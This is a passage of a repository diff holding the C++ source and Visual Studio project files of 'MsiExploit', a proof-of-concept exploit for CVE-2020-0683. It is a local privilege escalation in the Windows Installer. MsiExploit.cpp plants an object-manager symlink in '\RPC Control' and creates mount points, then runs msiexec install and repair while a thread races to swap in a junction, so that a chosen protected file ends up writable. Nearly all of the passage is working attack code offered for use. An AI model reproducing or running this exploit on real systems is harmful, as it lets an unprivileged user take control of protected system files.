if (GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr) > 0)
{
ret += buf;
}
else
{
ret += path;
}
return ret;
}
std::wstring GetFileName(const std::wstring& s) {
char sep = '/';
#ifdef _WIN32
sep = '\\';
#endif
size_t i = s.rfind(sep, s.length());
if (i != std::string::npos) {
return(s.substr(i + 1, s.length() - i));
}
return(L"");
}
std::wstring GetDirectoryName(const std::wstring& filename) {
std::wstring directory = L"";
const size_t last_slash_idx = filename.rfind('\\');
if (std::string::npos != last_slash_idx)
{
directory = filename.substr(0, last_slash_idx);
}
return directory;
}

25
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/CommonUtils.h Normal file
View File

@ -0,0 +1,25 @@
#pragma once
#include <Windows.h>
#include <string>
typedef void(__stdcall *console_output)(const char*);
void DebugSetOutput(console_output pout);
void DebugPrintf(const char* lpFormat, ...);
HANDLE CreateSymlink(HANDLE root, LPCWSTR linkname, LPCWSTR targetname);
HANDLE OpenSymlink(HANDLE root, LPCWSTR linkname);
HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR dirname, HANDLE hShadow);
HANDLE OpenObjectDirectory(HANDLE hRoot, LPCWSTR dirname);
std::wstring GetErrorMessage(DWORD dwError);
std::wstring GetErrorMessage();
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege);
bool CreateRegSymlink(LPCWSTR lpSymlink, LPCWSTR lpTarget, bool bVolatile);
bool DeleteRegSymlink(LPCWSTR lpSymlink);
DWORD NtStatusToDosError(NTSTATUS status);
bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname);
bool CreateNativeHardlink(LPCWSTR targetname, HANDLE hFile);
HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options);
std::wstring BuildFullPath(const std::wstring& path, bool native);
std::wstring GetFileName(const std::wstring& s);
std::wstring GetDirectoryName(const std::wstring& filename);

192
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/FileOpLock.cpp Normal file
View File

@ -0,0 +1,192 @@
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "stdafx.h"
#include "FileOpLock.h"
#include <threadpoolapiset.h>
void DebugPrintf(LPCSTR lpFormat, ...);
FileOpLock::FileOpLock(UserCallback cb) :
g_inputBuffer({ 0 }), g_outputBuffer({ 0 }), g_o({ 0 }), g_hFile(INVALID_HANDLE_VALUE), g_hLockCompleted(nullptr), g_wait(nullptr), _cb(cb)
{
g_inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
g_inputBuffer.StructureLength = sizeof(g_inputBuffer);
//g_inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE ;
//g_inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_WRITE ;
g_inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_WRITE;
g_inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
g_outputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
g_outputBuffer.StructureLength = sizeof(g_outputBuffer);
}
FileOpLock::~FileOpLock()
{
if (g_wait)
{
SetThreadpoolWait(g_wait, nullptr, nullptr);
CloseThreadpoolWait(g_wait);
g_wait = nullptr;
}
if (g_o.hEvent)
{
CloseHandle(g_o.hEvent);
g_o.hEvent = nullptr;
}
if (g_hFile != INVALID_HANDLE_VALUE)
{
CloseHandle(g_hFile);
g_hFile = INVALID_HANDLE_VALUE;
}
}
bool FileOpLock::BeginLock(const std::wstring& filename, DWORD dwShareMode, bool exclusive)
{
g_hLockCompleted = CreateEvent(nullptr, TRUE, FALSE, nullptr);
g_o.hEvent = CreateEvent(nullptr, FALSE, FALSE, nullptr);
DWORD flags = FILE_FLAG_OVERLAPPED;
WIN32_FILE_ATTRIBUTE_DATA fInfo;
//DWORD dwAttrs = GetFileAttributesEx(filename.c_str(), GetFileExInfoStandard , &fInfo);
DWORD dwAttrs = GetFileAttributesW(filename.c_str());
if (dwAttrs & FILE_ATTRIBUTE_DIRECTORY)
{
flags |= FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT;
}
//g_hFile = CreateFileW(filename.c_str(), GENERIC_READ | GENERIC_WRITE | DELETE ,
g_hFile = CreateFileW(filename.c_str(), GENERIC_READ,
dwShareMode, nullptr, OPEN_EXISTING,
flags, nullptr);
if (g_hFile == INVALID_HANDLE_VALUE) {
DebugPrintf("Error opening file: %d\n", GetLastError());
return false;
}
g_wait = CreateThreadpoolWait(WaitCallback, this, nullptr);
if (g_wait == nullptr)
{
DebugPrintf("Error creating threadpool %d\n", GetLastError());
return false;
}
SetThreadpoolWait(g_wait, g_o.hEvent, nullptr);
DWORD bytesReturned;
if (exclusive)
{
DeviceIoControl(g_hFile,
FSCTL_REQUEST_OPLOCK_LEVEL_1,
NULL, 0,
NULL, 0,
&bytesReturned,
&g_o);
}
else
{
DeviceIoControl(g_hFile, FSCTL_REQUEST_OPLOCK,
&g_inputBuffer, sizeof(g_inputBuffer),
&g_outputBuffer, sizeof(g_outputBuffer),
nullptr, &g_o);
}
DWORD err = GetLastError();
if (err != ERROR_IO_PENDING) {
DebugPrintf("Oplock Failed %d\n", err);
return false;
}
return true;
}
FileOpLock* FileOpLock::CreateLock(const std::wstring& name, const std::wstring& share_mode, FileOpLock::UserCallback cb, HANDLE& fHandle)
{
FileOpLock* ret = new FileOpLock(cb);
DWORD dwShareMode = 0;
bool exclusive = false;
if (share_mode.find('r') != std::wstring::npos)
{
dwShareMode |= FILE_SHARE_READ;
}
if (share_mode.find('w') != std::wstring::npos)
{
dwShareMode |= FILE_SHARE_WRITE;
}
if (share_mode.find('d') != std::wstring::npos)
{
dwShareMode |= FILE_SHARE_DELETE;
}
if (share_mode.find('x') != std::wstring::npos)
{
exclusive = true;
}
if (ret->BeginLock(name, dwShareMode, exclusive))
{
fHandle = ret->g_hFile;
return ret;
}
else
{
delete ret;
return nullptr;
}
}
void FileOpLock::WaitForLock(UINT Timeout)
{
WaitForSingleObject(g_hLockCompleted, Timeout);
}
void FileOpLock::WaitCallback(PTP_CALLBACK_INSTANCE Instance,
PVOID Parameter, PTP_WAIT Wait,
TP_WAIT_RESULT WaitResult)
{
UNREFERENCED_PARAMETER(Instance);
UNREFERENCED_PARAMETER(Wait);
UNREFERENCED_PARAMETER(WaitResult);
FileOpLock* lock = reinterpret_cast<FileOpLock*>(Parameter);
lock->DoWaitCallback();
}
void FileOpLock::DoWaitCallback()
{
DWORD dwBytes;
if (!GetOverlappedResult(g_hFile, &g_o, &dwBytes, TRUE)) {
DebugPrintf("Oplock Failed\n");
}
if (_cb)
{
_cb();
}
DebugPrintf("Closing Handle\n");
CloseHandle(g_hFile);
g_hFile = INVALID_HANDLE_VALUE;
SetEvent(g_hLockCompleted);
}

36
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/FileOpLock.h Normal file
View File

@ -0,0 +1,36 @@
#pragma once
#include <Windows.h>
#include <string>
class FileOpLock
{
public:
typedef void(*UserCallback)();
static FileOpLock* CreateLock(const std::wstring& name, const std::wstring& share_mode, FileOpLock::UserCallback cb, HANDLE& fHandle);
void WaitForLock(UINT Timeout);
~FileOpLock();
private:
HANDLE g_hFile;
OVERLAPPED g_o;
REQUEST_OPLOCK_INPUT_BUFFER g_inputBuffer;
REQUEST_OPLOCK_OUTPUT_BUFFER g_outputBuffer;
HANDLE g_hLockCompleted;
PTP_WAIT g_wait;
UserCallback _cb;
FileOpLock(UserCallback cb);
static void CALLBACK WaitCallback(PTP_CALLBACK_INSTANCE Instance,
PVOID Parameter, PTP_WAIT Wait,
TP_WAIT_RESULT WaitResult);
void DoWaitCallback();
bool BeginLock(const std::wstring& name, DWORD dwShareMode, bool exclusive);
};

358
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/MsiExploit.cpp Normal file
View File

@ -0,0 +1,358 @@
#include "stdafx.h"
#include "FileOpLock.h"
#include "ReparsePoint.h"
#include <string>
#include <sddl.h>
#include <iostream>
#include <Windows.h>
#include "CommonUtils.h"
#include "ntimports.h"
#include "typed_buffer.h"
#include <chrono>
#include <thread>
#include <filesystem>
#include <iostream>
#include <fstream>
#include "Shlwapi.h"
#include "shlobj.h"
#pragma comment( lib, "shlwapi.lib")
const char* targetfile;
char buffermsi[1024];
bool bSuccess = false;
wchar_t appDataFilePath[MAX_PATH];
wchar_t appDataDirPath[MAX_PATH];
std::wstring targetfw;
std::wstring targetfwDos;
std::wstring s2ws(const std::string& str)
{
int size_needed = MultiByteToWideChar(CP_UTF8, 0, &str[0], (int)str.size(), NULL, 0);
std::wstring wstrTo(size_needed, 0);
MultiByteToWideChar(CP_UTF8, 0, &str[0], (int)str.size(), &wstrTo[0], size_needed);
return wstrTo;
}
bool DoesFileExist(LPCWSTR lpszFilename)
{
DWORD fileAttr = GetFileAttributes(lpszFilename);
DWORD lastErr = GetLastError();
return ((fileAttr != INVALID_FILE_ATTRIBUTES)
&& (lastErr != ERROR_FILE_NOT_FOUND));
}
bool dirExists(LPCWSTR dirName_in)
{
DWORD ftyp = GetFileAttributes(dirName_in);
if (ftyp == INVALID_FILE_ATTRIBUTES)
return false; //something is wrong with your path!
if (ftyp & FILE_ATTRIBUTE_DIRECTORY)
return true; // this is a directory!
return false; // this is not a directory!
}
HANDLE CreateSymlink(HANDLE root, LPCWSTR linkname, LPCWSTR targetname)
{
DEFINE_NTDLL(RtlInitUnicodeString);
DEFINE_NTDLL(NtCreateSymbolicLinkObject);
OBJECT_ATTRIBUTES objAttr;
UNICODE_STRING name;
UNICODE_STRING target;
fRtlInitUnicodeString(&name, linkname);
fRtlInitUnicodeString(&target, targetname);
InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);
HANDLE hLink;
NTSTATUS status = fNtCreateSymbolicLinkObject(&hLink,
SYMBOLIC_LINK_ALL_ACCESS, &objAttr, &target);
if (status == 0)
{
//DebugPrintf("Opened Link %ls -> %ls: %p\n", linkname, targetname, hLink);
return hLink;
}
else
{
SetLastError(NtStatusToDosError(status));
return nullptr;
}
}
bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname, bool isNative)
{
std::wstring full_linkname = BuildFullPath(linkname, true);
size_t len = full_linkname.size() * sizeof(WCHAR);
typed_buffer_ptr<FILE_LINK_INFORMATION> link_info(sizeof(FILE_LINK_INFORMATION) + len - sizeof(WCHAR));
memcpy(&link_info->FileName[0], full_linkname.c_str(), len);
link_info->ReplaceIfExists = TRUE;
link_info->FileNameLength = len;
std::wstring full_targetname;
if (!isNative)
{
full_targetname = BuildFullPath(targetname, true);
}
else
{
full_targetname = targetname;
}
HANDLE hFile = OpenFileNative(full_targetname.c_str(), nullptr, MAXIMUM_ALLOWED, FILE_SHARE_READ, 0);
if (hFile)
{
DEFINE_NTDLL(ZwSetInformationFile);
IO_STATUS_BLOCK io_status = { 0 };
NTSTATUS status = fZwSetInformationFile(hFile, &io_status, link_info, link_info.size(), FileLinkInformation);
CloseHandle(hFile);
if (NT_SUCCESS(status))
{
return true;
}
SetNtLastError(status);
}
return false;
}
DWORD WINAPI MyThreadFunction(LPVOID lpParam)
{
int i = 0;
while (TRUE)
{
if (!PathFileExists(appDataFilePath))
{
printf("[+] IN 1\n");
while (TRUE)
{
if (PathFileExists(appDataFilePath))
{
if (!ReparsePoint::CreateMountPoint(appDataDirPath, L"\\RPC Control", L""))
{
printf("[+] Big Faiiilll \n");
}
printf("[+] OUT -> junction created \n");
break;
}
else
{
continue;
}
}
break;
}
else
{
continue;
}
}
return 0;
}
DWORD GetNumCPUs() {
SYSTEM_INFO m_si = { 0, };
GetSystemInfo(&m_si);
return m_si.dwNumberOfProcessors;
}
HANDLE *m_threads = NULL;
void runme() {
/*DWORD c = GetNumCPUs();
m_threads = new HANDLE[c];
for (DWORD i = 0; i < c; i++)
{
DWORD m_id = 0;
m_threads[i] = CreateThread(NULL, 0, MyThreadFunction, (LPVOID)i, NULL, &m_id);
SetThreadPriority(m_threads[i], THREAD_PRIORITY_HIGHEST);
wprintf(L"Creating Thread %d (0x%08x) Assigning to CPU 0x%08x\r\n", i, (LONG_PTR)m_threads[i], THREAD_PRIORITY_HIGHEST);
//WaitForSingleObject(m_threads[i], INFINITE);
}*/
HANDLE mThread = CreateThread(NULL, 0, MyThreadFunction, NULL, 0, NULL);
SetThreadPriority(mThread, THREAD_PRIORITY_TIME_CRITICAL);
char buffer[1024];
sprintf(buffer, "msiexec /qn /fa foo.msi ");
printf("[+] Executing \"%s\" \n", buffer);
system(buffer);
WaitForSingleObject(mThread, INFINITE);
/*for (DWORD i = 0; i < c; i++)
{
WaitForSingleObject(m_threads[i], INFINITE);
}*/
}
int main(int argc, const char * argv[])
{
if (argc < 2) {
printf("Usage: %s <file_to_own> \n", argv[0]);
exit(1);
}
targetfile = argv[1];
std::string targetf(targetfile);
targetfw = L"\\??\\" + s2ws(targetf);
targetfwDos = s2ws(targetf);
const wchar_t* targetfww = targetfw.c_str();
if (!PathFileExists(targetfw.c_str()))
{
wprintf(L"[-] File %s does not exist \n", targetfw.c_str());
return 0;
}
//FOR DEBUG
//wprintf(L"[+] targetfw %s \n", targetfw.c_str());
//wprintf(L"[+] targetfwDos %s \n", targetfwDos.c_str());
// C:\Users\[USER]\ user home directory
// userHomePath -> C:\Users\[USER]\foomsi
WCHAR userHomePath[MAX_PATH];
if (!SUCCEEDED(SHGetFolderPathW(NULL, CSIDL_PROFILE, NULL, 0, userHomePath)))
{
printf("[-] Exiting... error - %d \n", GetLastError());
return 0;
}
if (!PathAppend(userHomePath, L"foomsi"))
{
printf("[-] Exiting... error - %d \n", GetLastError());
return 0;
}
// CSIDL_LOCAL_APPDATA -> C:\Users\[USER]\AppData\Local
HRESULT result = SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, appDataFilePath);
if (result != S_OK)
{
printf("[-] Exiting... error - %d \n", GetLastError());
return 0;
}
// appDataFilePath -> C:\Users\[USER]\AppData\Local\fakemsi\foo.txt
if (!PathAppend(appDataFilePath, L"fakemsi\\foo.txt"))
{
printf("[-] Exiting... error - %d \n", GetLastError());
return 0;
}
// appDataDirPath
result = SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, appDataDirPath);
if (result != S_OK)
{
printf("[-] Exiting... error - %d \n", GetLastError());
return 0;
}
// appDataDirPath -> C:\Users\[USER]\AppData\Local\fakemsi
if (!PathAppend(appDataDirPath, L"fakemsi"))
{
printf("[-] Exiting... error - %d \n", GetLastError());
return 0;
}
printf("[-] Removing and creating temporary directory \n");
wchar_t bufferSystem[1024];
wsprintf(bufferSystem, L"rd /s /q %s 2>NUL", userHomePath);
_wsystem(bufferSystem);
wsprintf(bufferSystem, L"md %s", userHomePath);
_wsystem(bufferSystem);
wsprintf(bufferSystem, L"rd /s /q %s 2>NUL", appDataDirPath);
_wsystem(bufferSystem);
wsprintf(bufferSystem, L"md %s", appDataDirPath);
_wsystem(bufferSystem);
//wprintf(L"[+] Fullpath is %s \n", appDataDirPath);
wprintf(L"[+] Creating mountpoint from %s to %s \n", appDataDirPath , userHomePath);
if(!ReparsePoint::CreateMountPoint(appDataDirPath, userHomePath , L""))
{
printf("[-] Exiting... error - %d \n", GetLastError());
return 0;
}
wprintf(L"[+] Creating symlink %s in \\RPC Control\\foo.txt \n", targetfww);
HANDLE hret = CreateSymlink(nullptr, L"\\RPC Control\\foo.txt", targetfww);
if ((NULL) == hret || (hret == INVALID_HANDLE_VALUE))
{
printf("[-] Failed creating symlink index %d ", GetLastError());
return 0;
}
// msi product file to remove/install/configure
// remove eventually msi package
sprintf(buffermsi, "msiexec /qn /x foo.msi ");
printf("[-] Removing msi package \"%s\" \n", buffermsi);
system(buffermsi);
// install msi package
sprintf(buffermsi, "msiexec /qn /i foo.msi ");
printf("[+] Installing msi package \"%s\" \n", buffermsi);
system(buffermsi);
printf("[*] Now waiting .... \n");
// core thread
runme();
//FOR DEBUG
sprintf(buffermsi, "icacls \"%s\" ", targetfile);
printf("[+] ACL on target file %s \n", buffermsi);
system(buffermsi);
HANDLE h = CreateFile(targetfwDos.c_str(),
GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, //0, //
0,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
0);
if (h == INVALID_HANDLE_VALUE)
{
//g_last_error = GetLastError();
}
else
{
printf("[!] Exploit seems to work... \n");
}
wprintf(L"[-] Deleting mountpoint %s \n", appDataDirPath);
ReparsePoint::DeleteMountPoint(appDataDirPath);
printf("[>] Exiting... take care by @padovah4ck \n");
//printf("[-] Press any key to continue... \n");
//getchar();
return 0;
}

59
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/MsiExploit.filters Normal file
View File

@ -0,0 +1,59 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="ReparsePoint.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="ScopedHandle.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="FileOpLock.h">
<Filter>Source Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="rpc_c.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="ReparsePoint.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="ScopedHandle.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="FileOpLock.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="deletebug.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<Midl Include="rpc.idl">
<Filter>Source Files</Filter>
</Midl>
</ItemGroup>
</Project>

10
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/MsiExploit.user Normal file
View File

@ -0,0 +1,10 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>c:\windows\win.ini</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup>
<ShowAllFiles>true</ShowAllFiles>
</PropertyGroup>
</Project>

184
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/MsiExploit.vcxproj Normal file
View File

@ -0,0 +1,184 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>15.0</VCProjectVersion>
<ProjectGuid>{E75DCF6C-9B6D-49C8-96D7-0003C127B449}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>Poc_MsiExploit</RootNamespace>
<ProjectName>MsiExploit</ProjectName>
<WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>C:\Program Files (x86)\Windows Kits\10\Include\10.0.10240.0\ucrt;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<DisableSpecificWarnings>4996</DisableSpecificWarnings>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="CommonUtils.h" />
<ClInclude Include="FileOpLock.h" />
<ClInclude Include="ntimports.h" />
<ClInclude Include="ReparsePoint.h" />
<ClInclude Include="ScopedHandle.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
<ClInclude Include="typed_buffer.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="CommonUtils.cpp" />
<ClCompile Include="FileOpLock.cpp" />
<ClCompile Include="MsiExploit.cpp" />
<ClCompile Include="ReparsePoint.cpp" />
<ClCompile Include="ScopedHandle.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<None Include="foo.msi">
<DeploymentContent>true</DeploymentContent>
</None>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

10
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/MsiExploit.vcxproj.user Normal file
View File

@ -0,0 +1,10 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>c:\windows\win.ini</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup>
<ShowAllFiles>true</ShowAllFiles>
</PropertyGroup>
</Project>
